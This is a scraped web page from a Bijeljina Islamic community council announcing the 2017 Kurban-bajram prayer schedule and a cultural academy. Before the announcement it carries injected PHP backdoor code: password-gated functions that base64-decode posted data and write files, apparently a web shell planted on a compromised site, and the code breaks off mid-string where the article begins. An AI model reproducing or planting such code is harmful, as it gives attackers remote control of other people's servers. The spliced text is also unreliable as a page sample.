function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" MIZ Bijeljina - Centralna bajramska svečanost 1. septembra u Sultan Sulejmanovoj Atik džamiji - Medžlis Islamske zajednice Bijeljina

MIZ Bijeljina – Centralna bajramska svečanost 1. septembra u Sultan Sulejmanovoj Atik džamiji

MIZ Bijeljina – Centralna bajramska svečanost 1. septembra u Sultan Sulejmanovoj Atik džamiji

Prema takvimu Rijaseta Islamske zajednice u Bosni i Hercegovini Kurban-bajram je u petak, 1. septembra 2017. godine / 10. zul-hidždže 1438. godine po Hidžri.

Centralna bajramska svečanost za područje Medžlisa Islamske zajednice Bijeljina održat će se u Sultan Sulejmanovoj Atik džamiji u Bijeljini.

Sabah namaz će se klanjati u 5:30 sati, od kada počinje ostali dio programa, koji će izvesti članovi horske sekcije Mektebskog centra. U okviru programa, bajramski vaz će održati Mirsad ef. Okanović, imam bijeljinske Sulejmanije.

Bajram namaz, sa početkom u 6:47 sati, predvodit će i hutbu održati Samir ef. Camić, glavni imam Medžlisa Islamske zajednice Bijeljina.

Uz dovu Svemogućem Gospodaru da ukabuli ibadete hadža svim hadžijama, da muslimanski ummet učini boljim i jedinstvenijim, da svojom milošću ispuni srca svih dobrih ljudi i da one koji nered na Zemlji čine, uputi na pravi put, na put Dobra, svim našim džematlijama i svim muslimanima:

BAJRAM ŠERIF MUBAREK OLSUN!

MIZ Bijeljina proslijedio je upute svim džematima, a na bajram-namazu svi imami posebno će podsjetiti na ibadete kurbana, odnosno pravilnog postupanja sa kožama i mesom kurbana, kako bi bio primljen od Allaha, dželešanuhu. Molimo džematlije da na ova uputstva posebno obrate pažnju.


Tradicionalna Kurban-bajramska akademija posvećena je dvadesetogodišnjici obnove rada MIZ Bijeljina.
Pod nazivom”Šapat vremena”, održat će se u nedjelju, 3. septembra 2017. g., u Centru za kulturu Bijeljina, sa početkom u 20:00 sati. Bujrum!